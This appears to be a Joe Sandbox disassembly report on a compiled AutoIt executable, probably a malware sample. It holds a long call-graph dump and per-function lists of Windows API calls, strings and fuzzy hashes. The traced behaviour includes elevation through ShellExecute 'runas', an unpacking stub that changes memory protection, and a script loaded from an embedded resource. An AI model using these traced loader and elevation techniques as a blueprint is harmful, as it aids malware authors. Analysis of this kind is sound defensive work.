8ea0b5 90 API calls 4 library calls 100430->100567 100432 887f41 60 API calls 100432->100448 100433 8877c7 60 API calls 100433->100443 100435 8881a7 60 API calls 100435->100443 100436 8c048e 100437 8a2f80 68 API calls __cinit 100437->100443 100439 8d7405 60 API calls 100439->100443 100441 8d66f4 Mailbox 60 API calls 100441->100438 100442 8c0e00 100566 8ea0b5 90 API calls 4 library calls 100442->100566 100443->100422 100443->100426 100443->100429 100443->100430 100443->100433 100443->100435 100443->100437 100443->100438 100443->100439 100443->100442 100446 88a6ba 100443->100446 100551 88ca20 332 API calls 2 library calls 100443->100551 100552 88ba60 61 API calls Mailbox 100443->100552 100565 8ea0b5 90 API calls 4 library calls 100446->100565 100447 8d66f4 Mailbox 60 API calls 100447->100448 100448->100421 100448->100432 100448->100438 100448->100443 100448->100447 100449 88a000 332 API calls 100448->100449 100451 8c0c94 100448->100451 100453 8c0ca2 100448->100453 100456 88b37c 100448->100456 100457 8a0ff6 60 API calls Mailbox 100448->100457 100462 88b416 100448->100462 100465 88ade2 Mailbox 100448->100465 100473 8fc5f4 100448->100473 100505 8e7be0 100448->100505 100511 8fbf80 100448->100511 100558 8d7405 60 API calls 100448->100558 100559 8fc4a7 86 API calls 2 library calls 100448->100559 100449->100448 100563 889df0 60 API calls Mailbox 100451->100563 100564 8ea0b5 90 API calls 4 library calls 100453->100564 100455 8c0c86 100455->100438 100455->100441 100554 889e9c 61 API calls Mailbox 100456->100554 100457->100448 100459 88b38d 100555 889e9c 61 API calls Mailbox 100459->100555 100556 88f803 332 API calls 100462->100556 100465->100421 100465->100438 100465->100455 100466 8c00e0 VariantClear 100465->100466 100467 8f474d 332 API calls 100465->100467 100468 8fe24b 131 API calls 100465->100468 100469 8ed2e6 102 API calls 100465->100469 100470 8fe237 131 API calls 100465->100470 100471 892123 96 API calls 100465->100471 100472 885906 61 API calls 100465->100472 100553 
889df0 60 API calls Mailbox 100465->100553 100560 8d7405 60 API calls 100465->100560 100466->100465 100467->100465 100468->100465 100469->100465 100470->100465 100471->100465 100472->100465 100474 8877c7 60 API calls 100473->100474 100475 8fc608 100474->100475 100476 8877c7 60 API calls 100475->100476 100477 8fc610 100476->100477 100478 8877c7 60 API calls 100477->100478 100479 8fc618 100478->100479 100480 889997 85 API calls 100479->100480 100504 8fc626 100480->100504 100481 887d2c 60 API calls 100481->100504 100482 8fc80f 100483 8fc83c Mailbox 100482->100483 100576 889b9c 60 API calls Mailbox 100482->100576 100483->100448 100485 8fc7f6 100569 887e0b 100485->100569 100487 887a84 60 API calls 100487->100504 100488 8fc811 100490 887e0b 60 API calls 100488->100490 100493 8fc820 100490->100493 100491 8881a7 60 API calls 100491->100504 100492 887c8e 60 API calls 100492->100482 100496 887c8e 60 API calls 100493->100496 100494 887faf 60 API calls 100495 8fc6bd CharUpperBuffW 100494->100495 100568 88859a 69 API calls 100495->100568 100496->100482 100497 887faf 60 API calls 100499 8fc77d CharUpperBuffW 100497->100499 100500 88c707 70 API calls 100499->100500 100500->100504 100501 889997 85 API calls 100501->100504 100502 887e0b 60 API calls 100502->100504 100503 887c8e 60 API calls 100503->100504 100504->100481 100504->100482 100504->100483 100504->100485 100504->100487 100504->100488 100504->100491 100504->100494 100504->100497 100504->100501 100504->100502 100504->100503 100506 8e7bec 100505->100506 100507 8a0ff6 Mailbox 60 API calls 100506->100507 100508 8e7bfa 100507->100508 100509 8e7c08 100508->100509 100510 8877c7 60 API calls 100508->100510 100509->100448 100510->100509 100512 8fbfab 100511->100512 100513 8fbfc5 100511->100513 100582 8ea0b5 90 API calls 4 library calls 100512->100582 100583 8fa528 60 API calls Mailbox 100513->100583 100516 8fbfd0 100517 88a000 331 API calls 100516->100517 100518 8fc031 100517->100518 100519 8fbfbd Mailbox 100518->100519 100520 
8fc0c3 100518->100520 100524 8fc072 100518->100524 100519->100448 100521 8fc119 100520->100521 100522 8fc0c9 100520->100522 100521->100519 100523 889997 85 API calls 100521->100523 100603 8e7ba4 60 API calls 100522->100603 100525 8fc12b 100523->100525 100584 8e7581 60 API calls Mailbox 100524->100584 100528 887faf 60 API calls 100525->100528 100532 8fc14f CharUpperBuffW 100528->100532 100529 8fc0ec 100604 885ea1 60 API calls Mailbox 100529->100604 100531 8fc0a2 100585 88f5c0 100531->100585 100535 8fc169 100532->100535 100533 8fc0f4 Mailbox 100605 88fe40 332 API calls 2 library calls 100533->100605 100536 8fc1bc 100535->100536 100537 8fc170 100535->100537 100539 889997 85 API calls 100536->100539 100606 8e7581 60 API calls Mailbox 100537->100606 100540 8fc1c4 100539->100540 100607 889fbd 61 API calls 100540->100607 100543 8fc19e 100544 88f5c0 331 API calls 100543->100544 100544->100519 100545 8fc1ce 100545->100519 100546 889997 85 API calls 100545->100546 100547 8fc1e9 100546->100547 100608 885ea1 60 API calls Mailbox 100547->100608 100549 8fc1f9 100609 88fe40 332 API calls 2 library calls 100549->100609 100551->100443 100552->100443 100553->100465 100554->100459 100555->100462 100556->100421 100557->100448 100558->100448 100559->100448 100560->100465 100561->100436 100562->100455 100563->100455 100564->100455 100565->100438 100566->100430 100567->100438 100568->100504 100570 887e1f 100569->100570 100571 8bf173 100569->100571 100577 887db0 100570->100577 100573 888189 60 API calls 100571->100573 100575 8bf17e __wsetenvp _memmove 100573->100575 100574 887e2a 100574->100492 100576->100483 100578 887dbf __wsetenvp 100577->100578 100579 888189 60 API calls 100578->100579 100580 887dd0 _memmove 100578->100580 100581 8bf130 _memmove 100579->100581 100580->100574 100582->100519 100583->100516 100584->100531 100586 88f61a 100585->100586 100587 88f7b0 100585->100587 100588 8c4848 100586->100588 100589 88f626 100586->100589 100590 887f41 60 API calls 100587->100590 100591 
8fbf80 332 API calls 100588->100591 100610 88f3f0 100589->100610 100592 88f6ec Mailbox 100590->100592 100596 8c4856 100591->100596 100600 8f474d 332 API calls 100592->100600 100602 8e3e73 3 API calls 100592->100602 100625 8ecde5 100592->100625 100594 88f65d 100594->100592 100595 88f790 100594->100595 100594->100596 100595->100519 100596->100595 100706 8ea0b5 90 API calls 4 library calls 100596->100706 100599 88f743 100599->100595 100705 889df0 60 API calls Mailbox 100599->100705 100600->100599 100602->100599 100603->100529 100604->100533 100605->100519 100606->100543 100607->100545 100608->100549 100609->100519 100611 88f59a 100610->100611 100613 88f41c 100610->100613 100708 8ea0b5 90 API calls 4 library calls 100611->100708 100613->100611 100621 88f459 _memmove 100613->100621 100614 88f533 100615 88f543 100614->100615 100707 8fa5ee 86 API calls Mailbox 100614->100707 100615->100594 100617 8a0ff6 60 API calls Mailbox 100617->100621 100618 8c4823 100710 88f803 332 API calls 100618->100710 100619 88a000 332 API calls 100619->100621 100621->100614 100621->100617 100621->100618 100621->100619 100622 8c47d3 100621->100622 100623 8c47d5 100621->100623 100622->100594 100709 8ea0b5 90 API calls 4 library calls 100623->100709 100626 8877c7 60 API calls 100625->100626 100627 8ece1a 100626->100627 100628 8877c7 60 API calls 100627->100628 100629 8ece23 100628->100629 100630 8ece37 100629->100630 100844 889c9c 60 API calls 100629->100844 100632 889997 85 API calls 100630->100632 100633 8ece54 100632->100633 100634 8ece76 100633->100634 100635 8ecf55 100633->100635 100704 8ecf85 Mailbox 100633->100704 100636 889997 85 API calls 100634->100636 100711 884f3d 100635->100711 100638 8ece82 100636->100638 100640 8881a7 60 API calls 100638->100640 100643 8ece8e 100640->100643 100641 8ecf81 100642 8877c7 60 API calls 100641->100642 100641->100704 100645 8ecfb6 100642->100645 100648 8eced4 100643->100648 100649 8ecea2 100643->100649 100644 884f3d 137 API calls 100644->100641 100646 
8877c7 60 API calls 100645->100646 100647 8ecfbf 100646->100647 100651 8877c7 60 API calls 100647->100651 100650 889997 85 API calls 100648->100650 100652 8881a7 60 API calls 100649->100652 100653 8ecee1 100650->100653 100654 8ecfc8 100651->100654 100655 8eceb2 100652->100655 100656 8881a7 60 API calls 100653->100656 100657 8877c7 60 API calls 100654->100657 100658 887e0b 60 API calls 100655->100658 100659 8eceed 100656->100659 100660 8ecfd1 100657->100660 100661 8ecebc 100658->100661 100845 8e4cd3 GetFileAttributesW 100659->100845 100663 889997 85 API calls 100660->100663 100664 889997 85 API calls 100661->100664 100666 8ecfde 100663->100666 100667 8ecec8 100664->100667 100665 8ecef6 100669 8ecf09 100665->100669 100671 887b52 60 API calls 100665->100671 100670 8846f9 60 API calls 100666->100670 100668 887c8e 60 API calls 100667->100668 100668->100648 100673 889997 85 API calls 100669->100673 100678 8ecf0f 100669->100678 100672 8ecff9 100670->100672 100671->100669 100675 887b52 60 API calls 100672->100675 100674 8ecf36 100673->100674 100846 8e3a2b 76 API calls Mailbox 100674->100846 100677 8ed008 100675->100677 100679 8ed03c 100677->100679 100681 887b52 60 API calls 100677->100681 100678->100704 100680 8881a7 60 API calls 100679->100680 100683 8ed04a 100680->100683 100682 8ed019 100681->100682 100682->100679 100685 887d2c 60 API calls 100682->100685 100684 887c8e 60 API calls 100683->100684 100686 8ed058 100684->100686 100687 8ed02e 100685->100687 100688 887c8e 60 API calls 100686->100688 100689 887d2c 60 API calls 100687->100689 100690 8ed066 100688->100690 100689->100679 100691 887c8e 60 API calls 100690->100691 100692 8ed074 100691->100692 100693 889997 85 API calls 100692->100693 100694 8ed080 100693->100694 100735 8e42ad 100694->100735 100696 8ed091 100697 8e3e73 3 API calls 100696->100697 100698 8ed09b 100697->100698 100699 889997 85 API calls 100698->100699 100703 8ed0cc 100698->100703 100700 8ed0b9 100699->100700 100789 8e93df 100700->100789 100847 884faa 
100703->100847 100704->100599 100705->100599 100706->100595 100707->100615 100708->100622 100709->100622 100710->100622 100853 884d13 100711->100853 100716 884f68 LoadLibraryExW 100863 884cc8 100716->100863 100717 8bdd0f 100719 884faa 85 API calls 100717->100719 100720 8bdd16 100719->100720 100722 884cc8 3 API calls 100720->100722 100724 8bdd1e 100722->100724 100889 88506b 100724->100889 100725 884f8f 100725->100724 100726 884f9b 100725->100726 100728 884faa 85 API calls 100726->100728 100730 884fa0 100728->100730 100730->100641 100730->100644 100732 8bdd45 100897 885027 100732->100897 100736 8e42c9 100735->100736 100737 8e42ce 100736->100737 100738 8e42dc 100736->100738 100739 8881a7 60 API calls 100737->100739 100740 8877c7 60 API calls 100738->100740 100788 8e42d7 Mailbox 100739->100788 100741 8e42e4 100740->100741 100742 8877c7 60 API calls 100741->100742 100743 8e42ec 100742->100743 100744 8877c7 60 API calls 100743->100744 100745 8e42f7 100744->100745 100746 8877c7 60 API calls 100745->100746 100747 8e42ff 100746->100747 100748 8877c7 60 API calls 100747->100748 100749 8e4307 100748->100749 100750 8877c7 60 API calls 100749->100750 100751 8e430f 100750->100751 100752 8877c7 60 API calls 100751->100752 100753 8e4317 100752->100753 100754 8877c7 60 API calls 100753->100754 100755 8e431f 100754->100755 100756 8846f9 60 API calls 100755->100756 100757 8e4336 100756->100757 100758 8846f9 60 API calls 100757->100758 100759 8e434f 100758->100759 100760 887b52 60 API calls 100759->100760 100761 8e435b 100760->100761 100762 8e436e 100761->100762 100763 887e8c 60 API calls 100761->100763 100764 887b52 60 API calls 100762->100764 100763->100762 100765 8e4377 100764->100765 100766 8e4387 100765->100766 100767 887e8c 60 API calls 100765->100767 100768 8881a7 60 API calls 100766->100768 100767->100766 100769 8e4393 100768->100769 100770 887c8e 60 API calls 100769->100770 100771 8e439f 100770->100771 101322 8e445f 60 API calls 100771->101322 100773 8e43ae 101323 8e445f 60 
102823->102826 102824 884c32 102825 884c95 2 API calls 102824->102825 102827 884c3a GetNativeSystemInfo 102825->102827 102826->102820 102828 884c4d FreeLibrary 102826->102828 102827->102826 102828->102820 102831 884c2e 102830->102831 102832 884c9e LoadLibraryA 102830->102832 102831->102823 102831->102824 102832->102831 102833 884caf GetProcAddress 102832->102833 102833->102831

                                                  Control-flow Graph

                                                  APIs
                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00883B7A
                                                  • IsDebuggerPresent.KERNEL32 ref: 00883B8C
                                                  • GetFullPathNameW.KERNEL32(00007FFF,?,?,009462F8,009462E0,?,?), ref: 00883BFD
                                                    • Part of subcall function 00887D2C: _memmove.LIBCMT ref: 00887D66
                                                    • Part of subcall function 00890A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00883C26,009462F8,?,?,?), ref: 00890ACE
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00883C81
                                                  • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,009393F0,00000010), ref: 008BD4BC
                                                  • SetCurrentDirectoryW.KERNEL32(?,009462F8,?,?,?), ref: 008BD4F4
                                                  • GetForegroundWindow.USER32 ref: 008BD57A
                                                  • ShellExecuteW.SHELL32(00000000,?,?), ref: 008BD581
                                                    • Part of subcall function 00883A58: GetSysColorBrush.USER32(0000000F), ref: 00883A62
                                                    • Part of subcall function 00883A58: LoadCursorW.USER32(00000000,00007F00), ref: 00883A71
                                                    • Part of subcall function 00883A58: LoadIconW.USER32(00000063), ref: 00883A88
                                                    • Part of subcall function 00883A58: LoadIconW.USER32(000000A4), ref: 00883A9A
                                                    • Part of subcall function 00883A58: LoadIconW.USER32(000000A2), ref: 00883AAC
                                                    • Part of subcall function 00883A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00883AD2
                                                    • Part of subcall function 00883A58: RegisterClassExW.USER32(?), ref: 00883B28
                                                    • Part of subcall function 008839E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00883A15
                                                    • Part of subcall function 008839E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00883A36
                                                    • Part of subcall function 008839E7: ShowWindow.USER32(00000000), ref: 00883A4A
                                                    • Part of subcall function 008839E7: ShowWindow.USER32(00000000), ref: 00883A53
                                                    • Part of subcall function 008843DB: _memset.LIBCMT ref: 00884401
                                                    • Part of subcall function 008843DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 008844A6
                                                  Strings
                                                  • This is a third-party compiled AutoIt script., xrefs: 008BD4B4
                                                  • runas, xrefs: 008BD575
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                  • String ID: This is a third-party compiled AutoIt script.$runas
                                                  • API String ID: 529118366-3287110873
                                                  • Opcode ID: d96f1bfe84f3a21768920248462e3f0cef9ce5e3835b28c451f8080f3fd88b58
                                                  • Instruction ID: 4c6c1791734bafb2091e6875fdf8e64732a7af2dabcc0b593d81b2984bcc70f9
                                                  • Opcode Fuzzy Hash: d96f1bfe84f3a21768920248462e3f0cef9ce5e3835b28c451f8080f3fd88b58
                                                  • Instruction Fuzzy Hash: B05104B5A08249BFCF21BBB8DC15EED7B75FB46704B004065F461E22A1DAB09605EB23

                                                  Control-flow Graph

                                                  APIs
                                                  • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 008836D2
                                                  • KillTimer.USER32(?,00000001), ref: 008836FC
                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0088371F
                                                  • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 0088372A
                                                  • CreatePopupMenu.USER32 ref: 0088373E
                                                  • PostQuitMessage.USER32(00000000), ref: 0088375F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                                                  • String ID: TaskbarCreated
                                                  • API String ID: 157504867-2362178303
                                                  • Opcode ID: 60062132bb45698520a775210da0eba1b6a7d7c05e92bd2b3379bf6a49e0e2f6
                                                  • Instruction ID: 0c062564df891e824807cee73e0d8f50918cce7d87a9ae7672ca2534f889320a
                                                  • Opcode Fuzzy Hash: 60062132bb45698520a775210da0eba1b6a7d7c05e92bd2b3379bf6a49e0e2f6
                                                  • Instruction Fuzzy Hash: 3C41D4F2218209BBDF24BB6CDC09F793795F716700F140539F602C63A2EAA19A04A763

                                                  Control-flow Graph

                                                  APIs
                                                  • GetVersionExW.KERNEL32(?), ref: 00884B2B
                                                    • Part of subcall function 00887D2C: _memmove.LIBCMT ref: 00887D66
                                                  • GetCurrentProcess.KERNEL32(?,0090FAEC,00000000,00000000,?), ref: 00884BF8
                                                  • IsWow64Process.KERNEL32(00000000), ref: 00884BFF
                                                  • GetNativeSystemInfo.KERNEL32(00000000), ref: 00884C45
                                                  • FreeLibrary.KERNEL32(00000000), ref: 00884C50
                                                  • GetSystemInfo.KERNEL32(00000000), ref: 00884C81
                                                  • GetSystemInfo.KERNEL32(00000000), ref: 00884C8D
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                  • String ID:
                                                  • API String ID: 1986165174-0
                                                  • Opcode ID: a394d47e262ebf78e64a6c782c42e832c2a3dd1d19df85f0deb1a6051235c023
                                                  • Instruction ID: fad6916b993999c5e6e691e07ff9bc649d639e2e9988dc5e4c6ec0b6da844923
                                                  • Opcode Fuzzy Hash: a394d47e262ebf78e64a6c782c42e832c2a3dd1d19df85f0deb1a6051235c023
                                                  • Instruction Fuzzy Hash: C691C43254EBC5DEC731DB6884611AABFE5FF26310B58495ED0CAC3B01D234E908D719

                                                  Control-flow Graph

                                                  APIs
                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00884FF9
                                                  • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00884EEE,?,?,00000000,00000000), ref: 00885010
                                                  • LoadResource.KERNEL32(?,00000000,?,?,00884EEE,?,?,00000000,00000000,?,?,?,?,?,?,00884F8F), ref: 008BDD60
                                                  • SizeofResource.KERNEL32(?,00000000,?,?,00884EEE,?,?,00000000,00000000,?,?,?,?,?,?,00884F8F), ref: 008BDD75
                                                  • LockResource.KERNEL32(00884EEE,?,?,00884EEE,?,?,00000000,00000000,?,?,?,?,?,?,00884F8F,00000000), ref: 008BDD88
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                  • String ID: SCRIPT
                                                  • API String ID: 3051347437-3967369404
                                                  • Opcode ID: 590a27a9c67d1990cbd6bd26b4ffc058992510d98fff38c6a03e4cef46f2d2b3
                                                  • Instruction ID: 0abcacc66ccd3473931b032a7eb0ee8fe620690d6c23c6398ee182826cbc15c0
                                                  • Opcode Fuzzy Hash: 590a27a9c67d1990cbd6bd26b4ffc058992510d98fff38c6a03e4cef46f2d2b3
                                                  • Instruction Fuzzy Hash: F4119A75200B00BFD7319B69DC68F677BB9FBC9B11F208168F416C6660DB61E8009660

                                                  Control-flow Graph

                                                  APIs
                                                  • LoadLibraryA.KERNEL32(?), ref: 0099F1CA
                                                  • GetProcAddress.KERNEL32(?,00998FF9), ref: 0099F1E8
                                                  • ExitProcess.KERNEL32(?,00998FF9), ref: 0099F1F9
                                                  • VirtualProtect.KERNELBASE(00880000,00001000,00000004,?,00000000), ref: 0099F247
                                                  • VirtualProtect.KERNEL32(00880000,00001000), ref: 0099F25C
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                                  • String ID:
                                                  • API String ID: 1996367037-0
                                                  • Opcode ID: a57b1c306f46081fcef313c5b8e22add017808ad4ce27beddee57741ec5093a0
                                                  • Instruction ID: e326af8e9cffe4833b2e94728a1ee1960472bf9794d6ae9fcd004e7e3f7c58e0
                                                  • Opcode Fuzzy Hash: a57b1c306f46081fcef313c5b8e22add017808ad4ce27beddee57741ec5093a0
                                                  • Instruction Fuzzy Hash: D8511B72A587529BDF309EBCDCE0664F7A8EB55324B2C0739C5E1C73C6E7A4580687A0
                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(?,008BE7C1), ref: 008E46A6
                                                  • FindFirstFileW.KERNELBASE(?,?), ref: 008E46B7
                                                  • FindClose.KERNEL32(00000000), ref: 008E46C7
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: FileFind$AttributesCloseFirst
                                                  • String ID:
                                                  • API String ID: 48322524-0
                                                  • Opcode ID: 7f0693936b45c5a014bf4f305c02a90846bcc8e31da802d1481b0bc1fc4bc8e7
                                                  • Instruction ID: 3f9aba85dfc89bcb4a157bd7f9b710667798209024e7ab9bb8507ed63a989566
                                                  • Opcode Fuzzy Hash: 7f0693936b45c5a014bf4f305c02a90846bcc8e31da802d1481b0bc1fc4bc8e7
                                                  • Instruction Fuzzy Hash: CDE0D8324284006F9220B738EC5D4EA775CEE17375F100715F939C14F0E7B06A509595
                                                  Strings
                                                  • Variable must be of type 'Object'., xrefs: 008C428C
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Variable must be of type 'Object'.
                                                  • API String ID: 0-109567571
                                                  • Opcode ID: 92a4270153059d27ed3b598fc79dbe7a54b61b1afc34f19d8e5b4519dd369018
                                                  • Instruction ID: 086cbaaaded56ce4e3d581d240ba040e98a35dcaa68a4519966f10e06ae3db18
                                                  • Opcode Fuzzy Hash: 92a4270153059d27ed3b598fc79dbe7a54b61b1afc34f19d8e5b4519dd369018
                                                  • Instruction Fuzzy Hash: A4A2B474A04219CFCB24EF98C480AADB7B1FF59314F248469E916EB352D771ED82CB91
                                                  APIs
                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00890BBB
                                                  • timeGetTime.WINMM ref: 00890E76
                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00890FB3
                                                  • TranslateMessage.USER32(?), ref: 00890FC7
                                                  • DispatchMessageW.USER32(?), ref: 00890FD5
                                                  • Sleep.KERNEL32(0000000A), ref: 00890FDF
                                                  • LockWindowUpdate.USER32(00000000), ref: 0089105A
                                                  • DestroyWindow.USER32 ref: 00891066
                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00891080
                                                  • Sleep.KERNEL32(0000000A,?,?), ref: 008C52AD
                                                  • TranslateMessage.USER32(?), ref: 008C608A
                                                  • DispatchMessageW.USER32(?), ref: 008C6098
                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008C60AC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                                                  • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                  • API String ID: 4003667617-3242690629
                                                  • Opcode ID: 5712d0f1d8866f8a5b304aeaa4b3f15982b97e810ba61fffee0b60207b4e2216
                                                  • Instruction ID: 6f47c092f7adc2afc7b5f4e30988f45ea88e566af365fe7948ff1d35d17878d5
